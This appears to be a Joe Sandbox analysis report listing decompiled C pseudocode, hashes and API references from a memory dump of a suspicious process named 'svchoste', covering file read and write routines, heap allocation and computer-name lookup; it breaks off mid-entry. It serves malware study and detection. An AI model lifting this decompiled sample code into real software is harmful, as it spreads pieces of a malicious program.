Opcode Fuzzy Hash: abe5d5041c79abf16d454cf6a53527994666fc260ec6855c5aaa98695cec9ff6
Instruction Fuzzy Hash: 22E08C344C12109ECA627BA9A80320CB2F0EF14BA1F20C9EAB0791E0D2DE700640CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B86F90, Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B86F90(intOrPtr __ecx, void* __edi, void* __esi, void* _a4, signed int _a8) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed char _t101;
				void* _t102;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t148;
				void* _t149;
				void* _t150;

				_t149 = __esi;
				_t148 = __edi;
				_v28 = __ecx;
				_v8 = _a4;
				if(( *(_v28 + 0x2d) & 0x000000ff) == 0) {
					L11:
					_t110 = _v28;
					__eflags =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t128 = _v28;
						__eflags =  *((intOrPtr*)(_t128 + 4));
						if( *((intOrPtr*)(_t128 + 4)) == 0) {
							 *((intOrPtr*)(_v28 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						}
						WriteFile( *(_v28 + 4), _v8, _a8,  &_v16, 0); // executed
						return _v16;
					}
					_t131 = _v28;
					_t113 = _v28;
					__eflags =  *((intOrPtr*)(_t131 + 0x24)) + _a8 -  *((intOrPtr*)(_t113 + 0x28));
					if( *((intOrPtr*)(_t131 + 0x24)) + _a8 <  *((intOrPtr*)(_t113 + 0x28))) {
						E00B79240( *((intOrPtr*)(_v28 + 0x20)) +  *((intOrPtr*)(_v28 + 0x24)), _v8, _a8);
						 *((intOrPtr*)(_v28 + 0x24)) =  *((intOrPtr*)(_v28 + 0x24)) + _a8;
						return _a8;
					}
					 *((intOrPtr*)(_v28 + 0x14)) = 0x30000;
					return 0;
				}
				if( *(_v28 + 0x3c) != 0 &&  *((intOrPtr*)(_v28 + 0x40)) < _a8) {
					_v20 =  *(_v28 + 0x3c);
					_push(_v20);
					E00B74E04();
					_t150 = _t150 + 4;
					 *(_v28 + 0x3c) = 0;
				}
				if( *(_v28 + 0x3c) == 0) {
					_push(_a8 << 1);
					_t102 = E00B74E60(_t148, _t149, _a8 << 1);
					_t150 = _t150 + 4;
					_v24 = _t102;
					 *(_v28 + 0x3c) = _v24;
					 *((intOrPtr*)(_v28 + 0x40)) = _a8;
				}
				E00B79240( *(_v28 + 0x3c), _a4, _a8);
				_t150 = _t150 + 0xc;
				_v12 = 0;
				while(1) {
					_t157 = _v12 - _a8;
					if(_v12 >= _a8) {
						break;
					}
					_t101 = E00B85150( *( *(_v28 + 0x3c) + _v12) & 0x000000ff, _t157, _v28 + 0x30,  *( *(_v28 + 0x3c) + _v12) & 0x000000ff);
					_t150 = _t150 + 8;
					 *( *(_v28 + 0x3c) + _v12) = _t101;
					_v12 =  &(_v12->Internal);
				}
				_v8 =  *(_v28 + 0x3c);
				goto L11;
			}

0x00b86f90
0x00b86f90
0x00b86f96
0x00b86f9c
0x00b86fa8
0x00b87072
0x00b87072
0x00b87075
0x00b87079
0x00b870cd
0x00b870d0
0x00b870d4
0x00b870f9
0x00b87100
0x00000000
0x00b87100
0x00b870eb
0x00000000
0x00b870f1
0x00b8707b
0x00b87084
0x00b87087
0x00b8708a
0x00b870af
0x00b870c3
0x00000000
0x00b870c6
0x00b8708f
0x00000000
0x00b87096
0x00b86fb5
0x00b86fc8
0x00b86fce
0x00b86fcf
0x00b86fd4
0x00b86fda
0x00b86fda
0x00b86fe8
0x00b86fef
0x00b86ff0
0x00b86ff5
0x00b86ff8
0x00b87001
0x00b8700a
0x00b8700a
0x00b8701c
0x00b87021
0x00b87024
0x00b87036
0x00b87039
0x00b8703c
0x00000000
0x00000000
0x00b87053
0x00b87058
0x00b87064
0x00b87033
0x00b87033
0x00b8706f
0x00000000

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21a54aabf57b263c81dff85bb3b5eda76ddad0361edfd14644256407e32fc82c
Instruction ID: 8d957283f4287624bff33c2d7ff0b5233fffb338fbf1963db1fc9d277638d7a4
Opcode Fuzzy Hash: 21a54aabf57b263c81dff85bb3b5eda76ddad0361edfd14644256407e32fc82c
Instruction Fuzzy Hash: 5D51AAB4A04109DFCB44DF98D491EAEBBB6FF88314F208199E9159B355D731E981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B719C0, Relevance: 1.6, APIs: 1, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00B719C0(void* __eflags, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				void* __ecx;
				signed int _t50;
				intOrPtr _t61;
				void* _t66;
				intOrPtr* _t74;
				signed int _t109;
				void* _t110;

				_push(0xffffffff);
				_push(E00B96770);
				_push( *[fs:0x0]);
				_push(_t74);
				_t50 =  *0xba01f4; // 0xac8b3e58
				_push(_t50 ^ _t109);
				 *[fs:0x0] =  &_v16;
				_v20 = _t110 - 0x14;
				_v32 = _t74;
				_v28 = _a4 | 0x0000000f;
				if(E00B71980(_v32) >= _v28) {
					if( *(_v32 + 0x14) >> 1 > _v28 / 3) {
						if( *(_v32 + 0x14) > E00B71980(_v32) - ( *(_v32 + 0x14) >> 1)) {
							_v28 = E00B71980(_v32);
						} else {
							_v28 = ( *(_v32 + 0x14) >> 1) +  *(_v32 + 0x14);
						}
					}
				} else {
					_v28 = _a4;
				}
				_v8 = 0;
				_t61 = E00B71C20(_v32 + 0x18, _v28 + 1); // executed
				_v36 = _t61;
				_v24 = _v36;
				_v8 = 0xffffffff;
				if(_a8 > 0) {
					E00B71100(_v24, E00B71670(_v32), _a8);
				}
				E00B715F0(_v32, 1, 0);
				 *_v32 = _v24;
				 *(_v32 + 0x14) = _v28;
				_t66 = E00B71790(_v32, _a8);
				 *[fs:0x0] = _v16;
				return _t66;
			}

0x00b719c3
0x00b719c5
0x00b719d0
0x00b719d1
0x00b719d8
0x00b719df
0x00b719e3
0x00b719e9
0x00b719ec
0x00b719f5
0x00b71a03
0x00b71a23
0x00b71a3f
0x00b71a5c
0x00b71a41
0x00b71a4f
0x00b71a4f
0x00b71a3f
0x00b71a05
0x00b71a08
0x00b71a08
0x00b71a5f
0x00b71a73
0x00b71a78
0x00b71a7e
0x00b71ae3
0x00b71aee
0x00b71b01
0x00b71b06
0x00b71b10
0x00b71b1b
0x00b71b23
0x00b71b2d
0x00b71b35
0x00b71b43

APIs

Part of subcall function 00B71980: allocator.LIBCPMTD ref: 00B7198F

allocator.LIBCPMTD ref: 00B71A73

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: 4045730e8e22222564cb7bbebc7f8fd8ca1ca5aa32840952fd5d05d4314593e1
Instruction ID: b03b85877ec2e931765d467191f1c172e55654cdd2ca27dd11278f3409cb3eee
Opcode Fuzzy Hash: 4045730e8e22222564cb7bbebc7f8fd8ca1ca5aa32840952fd5d05d4314593e1
Instruction Fuzzy Hash: D841ED75E0410ADFCB08DF9CD891AAFB7F6FF48350F208559E929A7381D634A941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B849F0, Relevance: 1.6, APIs: 1, Instructions: 101
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B849F0(intOrPtr __ecx, void* _a4, long _a8) {
				long _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				int _t67;

				_v20 = __ecx;
				if( *((intOrPtr*)(_v20 + 0x84)) == 0) {
					if( *(_v20 + 0x7c) == 0) {
						 *((intOrPtr*)(_v20 + 0x14)) = 0x1000000;
						return 0;
					}
					_t67 = ReadFile( *(_v20 + 0x7c), _a4, _a8,  &_v16, 0); // executed
					_v12 = _t67;
					if(_v12 != 0) {
						 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v16;
						 *((intOrPtr*)(_v20 + 0x78)) = E00B83060( *((intOrPtr*)(_v20 + 0x78)), _a4, _v16);
						return _v16;
					}
					return 0;
				}
				if( *((intOrPtr*)(_v20 + 0x8c)) <  *((intOrPtr*)(_v20 + 0x88))) {
					_v8 =  *((intOrPtr*)(_v20 + 0x88)) -  *((intOrPtr*)(_v20 + 0x8c));
					if(_v8 > _a8) {
						_v8 = _a8;
					}
					E00B79240(_a4,  *((intOrPtr*)(_v20 + 0x84)) +  *((intOrPtr*)(_v20 + 0x8c)), _v8);
					 *((intOrPtr*)(_v20 + 0x8c)) =  *((intOrPtr*)(_v20 + 0x8c)) + _v8;
					 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v8;
					 *((intOrPtr*)(_v20 + 0x78)) = E00B83060( *((intOrPtr*)(_v20 + 0x78)), _a4, _v8);
					return _v8;
				}
				return 0;
			}

0x00b849f6
0x00b84a03
0x00b84ab9
0x00b84b19
0x00000000
0x00b84b20
0x00b84ad0
0x00b84ad6
0x00b84add
0x00b84aef
0x00b84b0c
0x00000000
0x00b84b0f
0x00000000
0x00b84adf
0x00b84a1b
0x00b84a36
0x00b84a3f
0x00b84a44
0x00b84a44
0x00b84a62
0x00b84a79
0x00b84a8b
0x00b84aa8
0x00000000
0x00b84aab
0x00000000

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00B84AD0

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 46658512b10034d07187d9f2a0c3bf072beaf7e783f0bc2eaa84e080815efa77
Instruction ID: 91490ea1150d1b46d62aa791cd0962f5bfd8662c5c7c39c9e1ed40f934b21535
Opcode Fuzzy Hash: 46658512b10034d07187d9f2a0c3bf072beaf7e783f0bc2eaa84e080815efa77
Instruction Fuzzy Hash: 9A4197B5A0011ADFCB44DF98C980BAEB7F5FF48304F2085A8E5699B355D731E941DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B848F0, Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00B848F0(void* __edi, void* __esi, void* __eflags, void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t36;
				intOrPtr _t41;
				intOrPtr _t44;
				signed int _t64;

				_t63 = __esi;
				_t62 = __edi;
				_push(0xffffffff);
				_push(E00B9643B);
				_t36 =  *0xba01f4; // 0xac8b3e58
				 *[fs:0x0] =  &_v16;
				_v32 = E00B74E60(__edi, __esi, __eflags, 0x4098, _t36 ^ _t64,  *[fs:0x0]);
				_v8 = 0;
				if(_v32 == 0) {
					_v48 = 0;
				} else {
					_v48 = E00B74050(_v32, _a16);
				}
				_v28 = _v48;
				_v8 = 0xffffffff;
				_v20 = _v28;
				_t41 = E00B82CB0(_v20, _a4, _a8, _a12); // executed
				 *0xba2ab0 = _t41;
				if( *0xba2ab0 == 0) {
					_push(8);
					_v44 = E00B74E60(_t62, _t63, __eflags);
					_v24 = _v44;
					 *_v24 = 2;
					 *((intOrPtr*)(_v24 + 4)) = _v20;
					_t44 = _v24;
				} else {
					_v40 = _v20;
					_v36 = _v40;
					if(_v36 == 0) {
						_v52 = 0;
					} else {
						_v52 = E00B74240(_v36, 1);
					}
					_t44 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t44;
			}

0x00b848f0
0x00b848f0
0x00b848f3
0x00b848f5
0x00b84904
0x00b8490f
0x00b84922
0x00b84925
0x00b84930
0x00b84943
0x00b84932
0x00b8493e
0x00b8493e
0x00b8494d
0x00b84950
0x00b8495a
0x00b8496c
0x00b84971
0x00b8497d
0x00b849ab
0x00b849b5
0x00b849bb
0x00b849c1
0x00b849cd
0x00b849d0
0x00b8497f
0x00b84982
0x00b84988
0x00b8498f
0x00b849a0
0x00b84991
0x00b8499b
0x00b8499b
0x00b849a7
0x00b849a7
0x00b849d6
0x00b849e1

APIs

Part of subcall function 00B74E60: _malloc.LIBCMT ref: 00B74E7A

codecvt.LIBCPMTD ref: 00B84996

Part of subcall function 00B74E60: std::exception::exception.LIBCMT ref: 00B74EAF
Part of subcall function 00B74E60: std::exception::exception.LIBCMT ref: 00B74EC9
Part of subcall function 00B74E60: __CxxThrowException@8.LIBCMT ref: 00B74EDA

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloccodecvt
String ID:
API String ID: 3802366972-0
Opcode ID: 449ba0a642c0a05ffbe7b23186900850b32269767dbc4671459eb2cd10fe3a57
Instruction ID: 836660b2431693837dd03ad53baa4983dceeb01831420d18300965cb6a05de3a
Opcode Fuzzy Hash: 449ba0a642c0a05ffbe7b23186900850b32269767dbc4671459eb2cd10fe3a57
Instruction Fuzzy Hash: 5031F4B4E04209DFCB14DF98D981BAEB7F1FB48314F108669E82AA7390D7345904CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7F4A0, Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00B7F4A0(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0xba149c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0xba1ac8;
					if( *0xba1ac8 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00B78F17(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00B75A49(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x00b7f4a5
0x00b7f4aa
0x00b7f4c7
0x00b7f4cc
0x00b7f4ce
0x00b7f4d0
0x00b7f4d2
0x00b7f4d2
0x00b7f4d2
0x00000000
0x00b7f4da
0x00b7f4e3
0x00b7f4e9
0x00b7f4eb
0x00000000
0x00000000
0x00b7f51f
0x00b7f521
0x00000000
0x00b7f4ed
0x00b7f4ed
0x00b7f4f4
0x00b7f512
0x00b7f515
0x00b7f517
0x00b7f519
0x00b7f519
0x00b7f4f6
0x00b7f4f7
0x00b7f4fd
0x00b7f4ff
0x00b7f4d3
0x00b7f4d3
0x00b7f4d5
0x00b7f4d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7f501
0x00b7f501
0x00b7f504
0x00b7f506
0x00b7f508
0x00b7f508
0x00b7f50e
0x00b7f50e
0x00b7f4ff
0x00000000
0x00b7f4ac
0x00b7f4b0
0x00b7f4b3
0x00b7f4b6
0x00000000
0x00b7f4b8
0x00b7f4bd
0x00b7f4c6
0x00b7f4c6
0x00b7f4b6
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B78822,00000000,?,00000000,00000000,00000000,?,00B783FD,00000001,00000214), ref: 00B7F4E3

Part of subcall function 00B75A49: __getptd_noexit.LIBCMT ref: 00B75A49

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 29c80f835da9d068859e46404b5ea6fd60ba644853f253e1de3720b878178022
Instruction ID: c2a64e4d3bb4ce35eb31ed087f235afd1ff0b3075031e382ecebcc4c51acbcd9
Opcode Fuzzy Hash: 29c80f835da9d068859e46404b5ea6fd60ba644853f253e1de3720b878178022
Instruction Fuzzy Hash: 34019A312012169BEB299E69EC54B7B33D5EB91360F14C9BAE93ECB290DB70EC00C654

Uniqueness

Uniqueness Score: -1.00%

Function 00B82C20, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B82C20(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;

				_push(__ecx);
				_v8 = __ecx;
				if(( *(_v8 + 0x1c) & 0x000000ff) != 0) {
					if( *((intOrPtr*)(_v8 + 0x20)) == 0) {
						if( *(_v8 + 4) == 0) {
							 *((intOrPtr*)(_v8 + 0x14)) = 0x1000000;
							return 0;
						}
						SetFilePointer( *(_v8 + 4), _a4 +  *((intOrPtr*)(_v8 + 0x10)), 0, 0); // executed
						return 1;
					}
					if(_a4 <  *((intOrPtr*)(_v8 + 0x28))) {
						 *((intOrPtr*)(_v8 + 0x24)) = _a4;
						return 1;
					}
					 *((intOrPtr*)(_v8 + 0x14)) = 0x30000;
					return 0;
				}
				 *((intOrPtr*)(_v8 + 0x14)) = 0x2000000;
				return 0;
			}

0x00b82c23
0x00b82c24
0x00b82c30
0x00b82c47
0x00b82c78
0x00b82c9c
0x00000000
0x00b82ca3
0x00b82c8f
0x00000000
0x00b82c95
0x00b82c52
0x00b82c68
0x00000000
0x00b82c6b
0x00b82c57
0x00000000
0x00b82c5e
0x00b82c35
0x00000000

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0605877ddb388cb8d68dd905130f98381d26401f7da8686e294518185224da0f
Instruction ID: cf98113d835a197181b406eefc35289bec15288300d4e3ffd75c6a8efa92d9a3
Opcode Fuzzy Hash: 0605877ddb388cb8d68dd905130f98381d26401f7da8686e294518185224da0f
Instruction Fuzzy Hash: 6B11DDB4A05204EBDB08DF54C685BAEBBF6EB49344F2081C9E8055B361C731EE41EF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B87A10, Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B87A10(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t22;
				intOrPtr _t25;

				if(_a4 != 0) {
					_v12 = _a4;
					if( *_v12 == 2) {
						_v8 =  *((intOrPtr*)(_v12 + 4));
						_t22 = E00B87880(_v8); // executed
						 *0xba2ab0 = _t22;
						_v20 = _v8;
						_v16 = _v20;
						if(_v16 == 0) {
							_v28 = 0;
						} else {
							_v28 = E00B74240(_v16, 1);
						}
						_v24 = _v12;
						_push(_v24);
						E00B74E04();
						_t25 =  *0xba2ab0; // 0x0
						return _t25;
					}
					 *0xba2ab0 = 0x80000;
					return 0x80000;
				}
				 *0xba2ab0 = 0x10000;
				return 0x10000;
			}

0x00b87a1a
0x00b87a30
0x00b87a39
0x00b87a52
0x00b87a58
0x00b87a5d
0x00b87a65
0x00b87a6b
0x00b87a72
0x00b87a83
0x00b87a74
0x00b87a7e
0x00b87a7e
0x00b87a8d
0x00b87a93
0x00b87a94
0x00b87a9c
0x00000000
0x00b87a9c
0x00b87a3b
0x00000000
0x00b87a45
0x00b87a1c
0x00000000

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a77301b89ec0cb9a8446544af4f03613fa184d3c762ff3e30108691bb6b1b05
Instruction ID: 0bdc38abde4641a8b7110db1d7cf57d55f97d3a931d5cbea33b2a6a1a4872a37
Opcode Fuzzy Hash: 9a77301b89ec0cb9a8446544af4f03613fa184d3c762ff3e30108691bb6b1b05
Instruction Fuzzy Hash: 9411D6B4E44209EFCB18EF98D8817ADBBF1FB44308F2081A9E81567751DB759E80CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B2E0, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B8B2E0() {
				signed int _v8;
				char _v276;
				long _v280;
				signed int _t7;
				int _t10;
				CHAR* _t11;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t7 ^ _t20;
				_v280 = 0x104;
				_t10 = GetComputerNameA( &_v276,  &_v280); // executed
				if(_t10 != 0) {
					_t11 =  &_v276;
				} else {
					_t11 =  *0xba22d4; // 0x2d06830
				}
				return E00B74354(_t11, _t13, _v8 ^ _t20, _t17, _t18, _t19);
			}

0x00b8b2e9
0x00b8b2f0
0x00b8b2f3
0x00b8b30b
0x00b8b313
0x00b8b31e
0x00b8b315
0x00b8b315
0x00b8b315
0x00b8b331

APIs

GetComputerNameA.KERNEL32(?,00000104), ref: 00B8B30B

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 476353c2f300314acf2424171e333422f81bbd619eff33b929b97d069307088b
Instruction ID: 898bc7c9a3853b93c40b7aec022a7258206e10585accce56fcebde7cc00854d6
Opcode Fuzzy Hash: 476353c2f300314acf2424171e333422f81bbd619eff33b929b97d069307088b
Instruction Fuzzy Hash: 14F0E57090011D9BDB18EF64DD83BE9B3F8EB19700F4401D9AA1997150DB749E48DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B7F2, Relevance: 1.5, APIs: 1, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B7B7F2(signed int __eax, signed int** __ecx, signed int* __esi) {
				signed int _t7;
				signed int** _t9;
				void* _t12;
				void* _t14;
				signed int* _t15;

				_t15 = __esi;
				_t9 = __ecx;
				_t7 = __eax;
				if((__ecx[3] & 0x00000040) == 0 || __ecx[2] != 0) {
					_t5 =  &(_t9[1]);
					 *_t5 = _t9[1] - 1;
					if( *_t5 < 0) {
						_t7 = E00B7B68E(_t12, _t14, _t7, _t9); // executed
					} else {
						 *( *_t9) = _t7;
						 *_t9 =  &(( *_t9)[0]);
						_t7 = _t7 & 0x000000ff;
					}
					if(_t7 != 0xffffffff) {
						goto L7;
					} else {
						 *_t15 =  *_t15 | _t7;
						return _t7;
					}
				} else {
					L7:
					 *_t15 =  *_t15 + 1;
					return _t7;
				}
			}

0x00b7b7f2
0x00b7b7f2
0x00b7b7f2
0x00b7b7f6
0x00b7b7fe
0x00b7b7fe
0x00b7b801
0x00b7b813
0x00b7b803
0x00b7b805
0x00b7b807
0x00b7b809
0x00b7b809
0x00b7b81d
0x00000000
0x00b7b81f
0x00b7b81f
0x00b7b821
0x00b7b821
0x00b7b822
0x00b7b822
0x00b7b822
0x00b7b824
0x00b7b824

APIs

__flsbuf.LIBCMT ref: 00B7B813

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction ID: 2f7ba6594f5cb63985f1fb6335d021e702d9e10c186f5b723f0fe4fbd8284515
Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction Fuzzy Hash: 7CE01A304051109EDA254E20D046B717BE8DB4172AF34C6CED5B9890E3D73A9447DE61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A380, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B8A39D

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: a608ee4ae2349945f97ac1eedf875faf1b2459b2b0c86ba069d3bd6771ee49b0
Instruction ID: 7e519b957c817e0801b9a64d0809f205abc3c48bae685662415b07cf38b1f16f
